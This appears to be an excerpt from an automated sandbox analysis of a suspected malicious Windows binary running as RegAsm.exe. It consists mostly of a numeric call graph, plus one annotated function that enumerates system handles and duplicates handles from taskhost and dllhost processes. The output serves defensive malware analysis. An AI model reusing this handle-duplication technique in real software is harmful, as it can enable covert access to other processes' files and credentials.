40cef5 39355 40aa04 ??3@YAXPAX 39354->39355 39356 40cefd 39355->39356 39356->39327 39358 40aa29 6 API calls 39359 40ce1d 39358->39359 39360 40aa29 6 API calls 39359->39360 39361 40ce3e 39360->39361 39362 40ce6a 39361->39362 39393 40abb7 wcslen memmove 39361->39393 39363 40ce9f 39362->39363 39396 40abb7 wcslen memmove 39362->39396 39366 40a8d0 7 API calls 39363->39366 39369 40ceb5 39366->39369 39367 40ce56 39394 40aa71 wcslen 39367->39394 39368 40ce8b 39397 40aa71 wcslen 39368->39397 39375 40a8d0 7 API calls 39369->39375 39372 40ce5e 39395 40abb7 wcslen memmove 39372->39395 39373 40ce93 39398 40abb7 wcslen memmove 39373->39398 39377 40cecb 39375->39377 39399 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39377->39399 39379 40cedd 39380 40aa04 ??3@YAXPAX 39379->39380 39381 40cee5 39380->39381 39382 40aa04 ??3@YAXPAX 39381->39382 39383 40ceed 39382->39383 39384 40aa04 ??3@YAXPAX 39383->39384 39384->39354 39386 40aa33 39385->39386 39392 40aa63 39385->39392 39387 40aa44 39386->39387 39388 40aa38 wcslen 39386->39388 39389 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39387->39389 39388->39387 39390 40aa4d 39389->39390 39391 40aa51 memcpy 39390->39391 39390->39392 39391->39392 39392->39354 39392->39358 39393->39367 39394->39372 39395->39362 39396->39368 39397->39373 39398->39363 39399->39379 39400->39337 39402 4438d0 39401->39402 39412 4438c9 39401->39412 39467 415378 memcpy memcpy 39402->39467 39412->39230 39416 415a77 39415->39416 39417 415a8d 39416->39417 39418 415a7e memset 39416->39418 39417->39234 39418->39417 39420 4438b5 11 API calls 39419->39420 39421 41525d 39420->39421 39421->39239 39423 444328 39422->39423 39424 444423 39423->39424 39425 44434e 39423->39425 39470 4446ea 11 API calls 39424->39470 39426 432d4e 3 API calls 39425->39426 39428 44435a 39426->39428 39430 444375 39428->39430 39435 44438b 39428->39435 39429 432d4e 3 API calls 39431 4443ec 39429->39431 39468 416935 16 API calls 39430->39468 39433 444381 39431->39433 39469 416935 16 API calls 39431->39469 39433->39245 39435->39429 39437 432d58 39436->39437 39439 432d65 39436->39439 39471 432cc4 memset memset memcpy 39437->39471 39439->39253 39441 41eee2 39440->39441 39442 415a6d memset 39441->39442 39443 41ef23 39442->39443 39444 415a6d memset 39443->39444 39455 41ef2d 39443->39455 39445 41ef42 39444->39445 39449 41ef49 39445->39449 39472 41b7d9 39445->39472 39447 41ef66 39448 41ef74 memset 39447->39448 39447->39449 39450 41ef91 39448->39450 39453 41ef9e 39448->39453 39449->39455 39490 41b321 100 API calls 39449->39490 39486 41519d 39450->39486 39453->39449 39489 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39453->39489 39455->39256 39456->39273 39457->39273 39458->39260 39459->39263 39460->39265 39461->39267 39462->39269 39463->39271 39464->39273 39465->39235 39466->39231 39468->39433 39469->39433 39470->39433 39471->39439 39478 41b812 39472->39478 39473 415a6d memset 39474 41b8c2 39473->39474 39475 41b980 39474->39475 39476 41b902 memcpy memcpy memcpy memcpy memcpy 39474->39476 39481 41b849 39474->39481 39483 41b9ad 39475->39483 39492 4151e3 39475->39492 39476->39475 39478->39481 39485 41b884 39478->39485 39491 444706 11 API calls 39478->39491 39480 41ba12 39480->39481 39482 41ba32 memset 39480->39482 39481->39447 39482->39481 39483->39481 39495 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39483->39495 39485->39473 39485->39481 39496 4175ed 39486->39496 39489->39449 39490->39455 39491->39485 39494 41837f 54 API calls 39492->39494 39493 4151f9 39493->39483 39494->39493 39495->39480 39497 417570 SetFilePointer GetLastError GetLastError 39496->39497 39498 4175ff 39497->39498 39499 41760a ReadFile 39498->39499 39500 4151b3 39498->39500 39501 417637 39499->39501 39502 417627 GetLastError 39499->39502 39500->39453 39501->39500 39503 41763e memset 39501->39503 39502->39500 39503->39500 39516 41703f 39504->39516 39506 43847a 39507 43848a 39506->39507 39508 43847e 39506->39508 39523 438270 39507->39523 39553 4446ea 11 API calls 39508->39553 39513 4384bb 39514 438270 133 API calls 39513->39514 39515 438488 39514->39515 39515->39276 39517 417044 39516->39517 39518 41705c 39516->39518 39522 417055 39517->39522 39555 416760 11 API calls 39517->39555 39519 417075 39518->39519 39556 41707a 11 API calls 39518->39556 39519->39506 39522->39506 39557 415a91 39523->39557 39525 43828d 39526 438297 39525->39526 39527 438341 39525->39527 39529 4382d6 39525->39529 39600 415c7d 16 API calls 39526->39600 39561 44358f 39527->39561 39532 4382fb 39529->39532 39533 4382db 39529->39533 39531 438458 39531->39515 39554 424f26 122 API calls 39531->39554 39594 415c23 memcpy 39532->39594 39592 416935 16 API calls 39533->39592 39536 4382e9 39593 415c7d 16 API calls 39536->39593 39537 438305 39540 44358f 19 API calls 39537->39540 39542 438318 39537->39542 39539 438373 39546 438383 39539->39546 39595 4300e8 memset memset memcpy 39539->39595 39540->39542 39542->39539 39587 43819e 39542->39587 39544 4383f5 39549 438404 39544->39549 39550 43841c 39544->39550 39545 4383cd 39545->39544 39597 42453e 122 API calls 39545->39597 39546->39545 39596 415c23 memcpy 39546->39596 39598 416935 16 API calls 39549->39598 39599 416935 16 API calls 39550->39599 39553->39515 39554->39513 39555->39522 39556->39517 39558 415a9d 39557->39558 39559 415ab3 39558->39559 39560 415aa4 memset 39558->39560 39559->39525 39560->39559 39562 4435be 39561->39562 39563 443676 39562->39563 39566 4436ce 39562->39566 39569 442ff8 19 API calls 39562->39569 39571 44366c 39562->39571 39585 44360c 39562->39585 39564 443737 39563->39564 39567 442ff8 19 API calls 39563->39567 39570 443758 39563->39570 39568 442ff8 19 API calls 39564->39568 39565 441409 memset 39565->39570 39573 4165ff 11 API calls 39566->39573 39567->39564 39568->39570 39569->39562 39570->39565 39575 443775 39570->39575 39574 4169a7 11 API calls 39571->39574 39572 4437be 39576 416760 11 API calls 39572->39576 39577 4437de 39572->39577 39573->39563 39574->39563 39575->39572 39581 415c56 11 API calls 39575->39581 39576->39577 39578 42463b memset memcpy 39577->39578 39580 443801 39577->39580 39578->39580 39579 443826 39583 43bd08 memset 39579->39583 39580->39579 39582 43024d memset 39580->39582 39581->39572 39582->39579 39584 443837 39583->39584 39584->39585 39586 43024d memset 39584->39586 39585->39542 39586->39584 39588 438246 39587->39588 39590 4381ba 39587->39590 39588->39539 39589 41f432 109 API calls 39589->39590 39590->39588 39590->39589 39591 41f638 103 API calls 39590->39591 39591->39590 39592->39536 39593->39526 39594->39537 39595->39546 39596->39545 39597->39544 39598->39526 39599->39526 39600->39531 39601->39282 39602->39286 39604 425108 39603->39604 39610 42510d 39603->39610 39648 424f74 123 API calls 39604->39648 39607 42516e 39649 415c7d 16 API calls 39607->39649 39608 425115 39608->39288 39610->39608 39616 42569b 39610->39616 39611->39288 39612->39288 39613->39296 39614->39295 39615->39286 39627 4256f1 39616->39627 39644 4259c2 39616->39644 39621 4260dd 39661 424251 119 API calls 39621->39661 39622 429a4d 39629 429a66 39622->39629 39630 429a9b 39622->39630 39626 422aeb memset memcpy memcpy 39626->39627 39627->39622 39627->39626 39632 4260a1 39627->39632 39641 4259da 39627->39641 39642 429ac1 39627->39642 39627->39644 39647 425a38 39627->39647 39650 4227f0 memset memcpy 39627->39650 39651 422b84 15 API calls 39627->39651 39652 422b5d memset memcpy memcpy 39627->39652 39653 422640 13 API calls 39627->39653 39655 4241fc 11 API calls 39627->39655 39656 42413a 89 API calls 39627->39656 39662 415c56 11 API calls 39629->39662 39631 429a96 39630->39631 39664 416760 11 API calls 39630->39664 39665 424251 119 API calls 39631->39665 39659 415c56 11 API calls 39632->39659 39634 429a7a 39663 416760 11 API calls 39634->39663 39660 416760 11 API calls 39641->39660 39643 425ad6 39642->39643 39666 415c56 11 API calls 39642->39666 39643->39607 39644->39643 39654 415c56 11 API calls 39644->39654 39647->39644 39657 422640 13 API calls 39647->39657 39658 4226e0 12 API calls 39647->39658 39648->39610 39649->39608 39650->39627 39651->39627 39652->39627 39653->39627 39654->39641 39655->39627 39656->39627 39657->39647 39658->39647 39659->39641 39660->39621 39661->39643 39662->39634 39663->39631 39664->39631 39665->39642 39666->39641 39667->38759 39668->38767 39669 44dea5 39670 44deb5 FreeLibrary 39669->39670 39671 44dec3 39669->39671 39670->39671 39672 4147f3 39675 414561 39672->39675 39674 414813 39676 41456d 39675->39676 39677 41457f GetPrivateProfileIntW 39675->39677 39680 4143f1 memset _itow WritePrivateProfileStringW 39676->39680 39677->39674 39679 41457a 39679->39674 39680->39679 39681 44def7 39682 44df07 39681->39682 39683 44df00 ??3@YAXPAX 39681->39683 39684 44df17 39682->39684 39685 44df10 ??3@YAXPAX 39682->39685 39683->39682 39686 44df27 39684->39686 39687 44df20 ??3@YAXPAX 39684->39687 39685->39684 39688 44df37 39686->39688 39689 44df30 ??3@YAXPAX 39686->39689 39687->39686 39689->39688 39690 4287c1 39691 4287d2 39690->39691 39692 429ac1 39690->39692 39693 428818 39691->39693 39694 42881f 39691->39694 39709 425711 39691->39709 39704 425ad6 39692->39704 39760 415c56 11 API calls 39692->39760 39727 42013a 39693->39727 39755 420244 96 API calls 39694->39755 39698 4260dd 39754 424251 119 API calls 39698->39754 39702 4259da 39753 416760 11 API calls 39702->39753 39705 429a4d 39711 429a66 39705->39711 39712 429a9b 39705->39712 39708 422aeb memset memcpy memcpy 39708->39709 39709->39692 39709->39702 39709->39705 39709->39708 39714 4260a1 39709->39714 39723 4259c2 39709->39723 39726 425a38 39709->39726 39743 4227f0 memset memcpy 39709->39743 39744 422b84 15 API calls 39709->39744 39745 422b5d memset memcpy memcpy 39709->39745 39746 422640 13 API calls 39709->39746 39748 4241fc 11 API calls 39709->39748 39749 42413a 89 API calls 39709->39749 39756 415c56 11 API calls 39711->39756 39713 429a96 39712->39713 39758 416760 11 API calls 39712->39758 39759 424251 119 API calls 39713->39759 39752 415c56 11 API calls 39714->39752 39716 429a7a 39757 416760 11 API calls 39716->39757 39723->39704 39747 415c56 11 API calls 39723->39747 39726->39723 39750 422640 13 API calls 39726->39750 39751 4226e0 12 API calls 39726->39751 39728 42014c 39727->39728 39731 420151 39727->39731 39770 41e466 96 API calls 39728->39770 39730 420162 39730->39709 39731->39730 39732 4201b3 39731->39732 39733 420229 39731->39733 39734 4201b8 39732->39734 39735 4201dc 39732->39735 39733->39730 39736 41fd5e 85 API calls 39733->39736 39761 41fbdb 39734->39761 39735->39730 39740 4201ff 39735->39740 39767 41fc4c 39735->39767 39736->39730 39740->39730 39742 42013a 96 API calls 39740->39742 39742->39730 39743->39709 39744->39709 39745->39709 39746->39709 39747->39702 39748->39709 39749->39709 39750->39726 39751->39726 39752->39702 39753->39698 39754->39704 39755->39709 39756->39716 39757->39713 39758->39713 39759->39692 39760->39702 39762 41fbf8 39761->39762 39765 41fbf1 39761->39765 39775 41ee26 39762->39775 39766 41fc39 39765->39766 39785 4446ce 11 API calls 39765->39785 39766->39730 39771 41fd5e 39766->39771 39768 41ee6b 85 API calls 39767->39768 39769 41fc5d 39768->39769 39769->39735 39770->39731 39773 41fd65 39771->39773 39772 41fdab 39772->39730 39773->39772 39774 41fbdb 85 API calls 39773->39774 39774->39773 39776 41ee41 39775->39776 39777 41ee32 39775->39777 39786 41edad 39776->39786 39789 4446ce 11 API calls 39777->39789 39780 41ee3c 39780->39765 39783 41ee58 39783->39780 39791 41ee6b 39783->39791 39785->39766 39795 41be52 39786->39795 39789->39780 39790 41eb85 11 API calls 39790->39783 39792 41ee70 39791->39792 39793 41ee78 39791->39793 39833 41bf99 85 API calls 39792->39833 39793->39780 39796 41be6f 39795->39796 39797 41be5f 39795->39797 39802 41be8c 39796->39802 39827 418c63 memset memset 39796->39827 39826 4446ce 11 API calls 39797->39826 39799 41be69 39799->39780 39799->39790 39802->39799 39803 41bf3a 39802->39803 39804 41bed1 39802->39804 39807 41bee7 39802->39807 39830 4446ce 11 API calls 39803->39830 39806 41bef0 39804->39806 39809 41bee2 39804->39809 39806->39807 39808 41bf01 39806->39808 39807->39799 39831 41a453 85 API calls 39807->39831 39810 41bf24 memset 39808->39810 39812 41bf14 39808->39812 39828 418a6d memset memcpy memset 39808->39828 39816 41ac13 39809->39816 39810->39799 39829 41a223 memset memcpy memset 39812->39829 39815 41bf20 39815->39810 39817 41ac52 39816->39817 39818 41ac3f memset 39816->39818 39821 41ac6a 39817->39821 39832 41dc14 19 API calls 39817->39832 39819 41acd9 39818->39819 39819->39807 39822 41519d 6 API calls 39821->39822 39823 41aca1 39821->39823 39822->39823 39823->39819 39824 41acc0 memset 39823->39824 39825 41accd memcpy 39823->39825 39824->39819 39825->39819 39826->39799 39827->39802 39828->39812 39829->39815 39830->39807 39832->39821 39833->39793 39834 417bc5 39836 417c61 39834->39836 39839 417bda 39834->39839 39835 417bf6 UnmapViewOfFile CloseHandle 39835->39835 39835->39839 39838 417c2c 39838->39839 39846 41851e 18 API calls 39838->39846 39839->39835 39839->39836 39839->39838 39841 4175b7 39839->39841 39842 4175d6 CloseHandle 39841->39842 39843 4175c8 39842->39843 39844 4175df 39842->39844 39843->39844 39845 4175ce Sleep 39843->39845 39844->39839 39845->39842 39846->39838 39847 4148b6 FindResourceW 39848 4148cf SizeofResource 39847->39848 39851 4148f9 39847->39851 39849 4148e0 LoadResource 39848->39849 39848->39851 39850 4148ee LockResource 39849->39850 39849->39851 39850->39851 39852 441b3f 39862 43a9f6 39852->39862 39854 441b61 40035 4386af memset 39854->40035 39856 44189a 39857 4418e2 39856->39857 39859 442bd4 39856->39859 39858 4418ea 39857->39858 40036 4414a9 12 API calls 39857->40036 39859->39858 40037 441409 memset 39859->40037 39863 43aa20 39862->39863 39870 43aadf 39862->39870 39864 43aa34 memset 39863->39864 39863->39870 39865 43aa56 39864->39865 39866 43aa4d 39864->39866 40038 43a6e7 39865->40038 40046 42c02e memset 39866->40046 39870->39854 39872 43aad3 40048 4169a7 11 API calls 39872->40048 39873 43aaae 39873->39870 39873->39872 39888 43aae5 39873->39888 39874 43ac18 39877 43ac47 39874->39877 40050 42bbd5 memcpy memcpy memcpy memset memcpy 39874->40050 39878 43aca8 39877->39878 40051 438eed 16 API calls 39877->40051 39882 43acd5 39878->39882 40053 4233ae 11 API calls 39878->40053 39881 43ac87 40052 4233c5 16 API calls 39881->40052 40054 423426 11 API calls 39882->40054 39886 43ace1 40055 439811 162 API calls 39886->40055 39887 43a9f6 160 API calls 39887->39888 39888->39870 39888->39874 39888->39887 40049 439bbb 22 API calls 39888->40049 39890 43acfd 39895 43ad2c 39890->39895 40056 438eed 16 API calls 39890->40056 39892 43ad19 40057 4233c5 16 API calls 39892->40057 39894 43ad58 40058 44081d 162 API calls 39894->40058 39895->39894 39898 43add9 39895->39898 39898->39898 40062 423426 11 API calls 39898->40062 39899 43ae3a memset 39900 43ae73 39899->39900 40063 42e1c0 146 API calls 39900->40063 39901 43adab 40060 438c4e 162 API calls 39901->40060 39902 43ad6c 39902->39870 39902->39901 40059 42370b memset memcpy memset 39902->40059 39906 43adcc 40061 440f84 12 API calls 39906->40061 39907 43ae96 40064 42e1c0 146 API calls 39907->40064 39910 43aea8 39913 43aec1 39910->39913 40065 42e199 146 API calls 39910->40065 39912 43af00 39912->39870 39917 43af1a 39912->39917 39918 43b3d9 39912->39918 39913->39912 40066 42e1c0 146 API calls 39913->40066 39914 43add4 39919 43b60f 39914->39919 40125 438f86 16 API calls 39914->40125 40067 438eed 16 API calls 39917->40067 39923 43b3f6 39918->39923 39928 43b4c8 39918->39928 39919->39870 40126 4393a5 17 API calls 39919->40126 39922 43af2f 40068 4233c5 16 API calls 39922->40068 40108 432878 12 API calls 39923->40108 39925 43af51 40069 423426 11 API calls 39925->40069 39927 43b4f2 40115 43a76c 21 API calls 39927->40115 39928->39927 40114 42bbd5 memcpy memcpy memcpy memset memcpy 39928->40114 39930 43af7d 40070 423426 11 API calls 39930->40070 39934 43af94 40071 423330 11 API calls 39934->40071 39935 43b529 40116 44081d 162 API calls 39935->40116 39936 43b462 40110 423330 11 API calls 39936->40110 39940 43b544 39944 43b55c 39940->39944 40117 42c02e memset 39940->40117 39941 43b428 39941->39936 40109 432b60 16 API calls 39941->40109 39942 43afca 40072 423330 11 API calls 39942->40072 39943 43b47e 39946 43b497 39943->39946 40111 42374a memcpy memset memcpy memcpy memcpy 39943->40111 40118 43a87a 162 API calls 39944->40118 40112 4233ae 11 API calls 39946->40112 39949 43afdb 40073 4233ae 11 API calls 39949->40073 39952 43b4b1 40113 423399 11 API calls 39952->40113 39954 43b56c 39957 43b58a 39954->39957 40119 423330 11 API calls 39954->40119 39956 43afee 40074 44081d 162 API calls 39956->40074 40120 440f84 12 API calls 39957->40120 39958 43b4c1 40122 42db80 162 API calls 39958->40122 39963 43b592 40121 43a82f 16 API calls 39963->40121 39966 43b5b4 40123 438c4e 162 API calls 39966->40123 39968 43b5cf 40124 42c02e memset 39968->40124 39970 43b005 39970->39870 39975 43b01f 39970->39975 40075 42d836 162 API calls 39970->40075 39971 43b1ef 40085 4233c5 16 API calls 39971->40085 39973 43b212 40086 423330 11 API calls 39973->40086 39975->39971 40083 423330 11 API calls 39975->40083 40084 42d71d 162 API calls 39975->40084 39977 43b087 40076 4233ae 11 API calls 39977->40076 39980 43b22a 40087 42ccb5 11 API calls 39980->40087 39983 43b23f 40088 4233ae 11 API calls 39983->40088 39984 43b10f 40079 423330 11 API calls 39984->40079 39986 43b257 40089 4233ae 11 API calls 39986->40089 39990 43b129 40080 4233ae 11 API calls 39990->40080 39991 43b26e 40090 4233ae 11 API calls 39991->40090 39994 43b09a 39994->39984 40077 42cc15 19 API calls 39994->40077 40078 4233ae 11 API calls 39994->40078 39996 43b282 40091 43a87a 162 API calls 39996->40091 39997 43b13c 40081 440f84 12 API calls 39997->40081 39999 43b29d 40092 423330 11 API calls 39999->40092 40002 43b15f 40082 4233ae 11 API calls 40002->40082 40003 43b2af 40005 43b2b8 40003->40005 40006 43b2ce 40003->40006 40093 4233ae 11 API calls 40005->40093 40094 440f84 12 API calls 40006->40094 40009 43b2c9 40096 4233ae 11 API calls 40009->40096 40010 43b2da 40095 42370b memset memcpy memset 40010->40095 40013 43b2f9 40097 423330 11 API calls 40013->40097 40015 43b30b 40098 423330 11 API calls 40015->40098 40017 43b325 40099 423399 11 API calls 40017->40099 40019 43b332 40100 4233ae 11 API calls 40019->40100 40021 43b354 40101 423399 11 API calls 40021->40101 40023 43b364 40102 43a82f 16 API calls 40023->40102 40025 43b370 40103 42db80 162 API calls 40025->40103 40027 43b380 40104 438c4e 162 API calls 40027->40104 40029 43b39e 40105 423399 11 API calls 40029->40105 40031 43b3ae 40106 43a76c 21 API calls 40031->40106 40033 43b3c3 40107 423399 11 API calls 40033->40107 40035->39856 40036->39858 40037->39859 40039 43a6f5 40038->40039 40040 43a765 40038->40040 40039->40040 40127 42a115 40039->40127 40040->39870 40047 4397fd memset 40040->40047 40044 43a73d 40044->40040 40045 42a115 146 API calls 40044->40045 40045->40040 40046->39865 40047->39873 40048->39870 40049->39888 40050->39877 40051->39881 40052->39878 40053->39882 40054->39886 40055->39890 40056->39892 40057->39895 40058->39902 40059->39901 40060->39906 40061->39914 40062->39899 40063->39907 40064->39910 40065->39913 40066->39913 40067->39922 40068->39925 40069->39930 40070->39934 40071->39942 40072->39949 40073->39956 40074->39970 40075->39977 40076->39994 40077->39994 40078->39994 40079->39990 40080->39997 40081->40002 40082->39975 40083->39975 40084->39975 40085->39973 40086->39980 40087->39983 40088->39986 40089->39991 40090->39996 40091->39999 40092->40003 40093->40009 40094->40010 40095->40009 40096->40013 40097->40015 40098->40017 40099->40019 40100->40021 40101->40023 40102->40025 40103->40027 40104->40029 40105->40031 40106->40033 40107->39914 40108->39941 40109->39936 40110->39943 40111->39946 40112->39952 40113->39958 40114->39927 40115->39935 40116->39940 40117->39944 40118->39954 40119->39957 40120->39963 40121->39958 40122->39966 40123->39968 40124->39914 40125->39919 40126->39870 40128 42a175 40127->40128 40130 42a122 40127->40130 40128->40040 40133 42b13b 146 API calls 40128->40133 40130->40128 40131 42a115 146 API calls 40130->40131 40134 43a174 40130->40134 40158 42a0a8 146 API calls 40130->40158 40131->40130 40133->40044 40148 43a196 40134->40148 40149 43a19e 40134->40149 40135 43a306 40135->40148 40172 4388c4 14 API calls 40135->40172 40138 42a115 146 API calls 40138->40149 40139 415a91 memset 40139->40149 40140 43a642 40140->40148 40177 4169a7 11 API calls 40140->40177 40144 43a635 40176 42c02e memset 40144->40176 40148->40130 40149->40135 40149->40138 40149->40139 40149->40148 40159 42ff8c 40149->40159 40167 4165ff 11 API calls 40149->40167 40168 439504 13 API calls 40149->40168 40169 4312d0 146 API calls 40149->40169 40170 42be4c memcpy memcpy memcpy memset memcpy 40149->40170 40171 43a121 11 API calls 40149->40171 40151 42bf4c 14 API calls 40153 43a325 40151->40153 40152 4169a7 11 API calls 40152->40153 40153->40140 40153->40144 40153->40148 40153->40151 40153->40152 40154 42b5b5 memset memcpy 40153->40154 40173 42b63e 14 API calls 40153->40173 40174 4165ff 11 API calls 40153->40174 40175 42bfcf memcpy 40153->40175 40154->40153 40158->40130 40178 43817e 40159->40178 40161 42ff99 40162 42ffe3 40161->40162 40163 42ffd0 40161->40163 40166 42ff9d 40161->40166 40183 4169a7 11 API calls 40162->40183 40182 4169a7 11 API calls 40163->40182 40166->40149 40167->40149 40168->40149 40169->40149 40170->40149 40171->40149 40172->40153 40173->40153 40174->40153 40175->40153 40176->40140 40177->40148 40179 438187 40178->40179 40181 438192 40178->40181 40184 4380f6 40179->40184 40181->40161 40182->40166 40183->40166 40186 43811f 40184->40186 40185 438164 40185->40181 40186->40185 40189 437e5e 40186->40189 40212 4300e8 memset memset memcpy 40186->40212 40213 437d3c 40189->40213 40191 437ea9 40192 437eb3 40191->40192 40198 437f22 40191->40198 40228 41f432 40191->40228 40192->40186 40195 437f06 40239 415c56 11 API calls 40195->40239 40197 437f95 40240 415c56 11 API calls 40197->40240 40199 437f7f 40198->40199 40200 432d4e 3 API calls 40198->40200 40199->40197 40201 43802b 40199->40201 40200->40199 40241 4165ff 11 API calls 40201->40241 40204 438054 40242 437371 137 API calls 40204->40242 40207 43806b 40208 438094 40207->40208 40243 42f50e 137 API calls 40207->40243 40209 437fa3 40208->40209 40244 4300e8 memset memset memcpy 40208->40244 40209->40192 40245 41f638 103 API calls 40209->40245 40212->40186 40214 437d69 40213->40214 40217 437d80 40213->40217 40246 437ccb 11 API calls 40214->40246 40216 437d76 40216->40191 40217->40216 40218 437da3 40217->40218 40221 437d90 40217->40221 40220 438460 133 API calls 40218->40220 40224 437dcb 40220->40224 40221->40216 40250 437ccb 11 API calls 40221->40250 40222 437de8 40249 424f26 122 API calls 40222->40249 40224->40222 40247 444283 13 API calls 40224->40247 40226 437dfc 40248 437ccb 11 API calls 40226->40248 40229 41f54d 40228->40229 40235 41f44f 40228->40235 40230 41f466 40229->40230 40280 41c635 memset memset 40229->40280 40230->40195 40230->40198 40235->40230 40237 41f50b 40235->40237 40251 41f1a5 40235->40251 40276 41c06f memcmp 40235->40276 40277 41f3b1 89 API calls 40235->40277 40278 41f398 85 API calls 40235->40278 40237->40229 40237->40230 40279 41c295 85 API calls 40237->40279 40239->40192 40240->40209 40241->40204 40242->40207 40243->40208 40244->40209 40245->40192 40246->40216 40247->40226 40248->40222 40249->40216 40250->40216 40252 41bc3b 100 API calls 40251->40252 40253 41f1b4 40252->40253 40254 41edad 85 API calls 40253->40254 40261 41f282 40253->40261 40255 41f1cb 40254->40255 40256 41f1f5 memcmp 40255->40256 40257 41f20e 40255->40257 40255->40261 40256->40257 40258 41f21b memcmp 40257->40258 40257->40261 40259 41f326 40258->40259 40262 41f23d 40258->40262 40260 41ee6b 85 API calls 40259->40260 40259->40261 40260->40261 40261->40235 40262->40259 40263 41f28e memcmp 40262->40263 40265 41c8df 55 API calls 40262->40265 40263->40259 40264 41f2a9 40263->40264 40264->40259 40267 41f308 40264->40267 40268 41f2d8 40264->40268 40266 41f269 40265->40266 40266->40259 40269 41f287 40266->40269 40270 41f27a 40266->40270 40267->40259 40274 4446ce 11 API calls 40267->40274 40271 41ee6b 85 API calls 40268->40271 40269->40263 40272 41ee6b 85 API calls 40270->40272 40273 41f2e0 40271->40273 40272->40261 40275 41b1ca memset 40273->40275 40274->40259 40275->40261 40276->40235 40277->40235 40278->40235 40279->40229 40280->40230 40281 41493c EnumResourceNamesW 40282 44660a 40285 4465e4 40282->40285 40284 446613 40286 4465f3 __dllonexit 40285->40286 40287 4465ed _onexit 40285->40287 40286->40284 40287->40286

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                          APIs
                                                          • memset.MSVCRT ref: 0040DDAD
                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                          • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                          • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                          • memset.MSVCRT ref: 0040DF5F
                                                          • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                                          • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                          • API String ID: 2018390131-3398334509
                                                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                          APIs
                                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                            • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                          • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
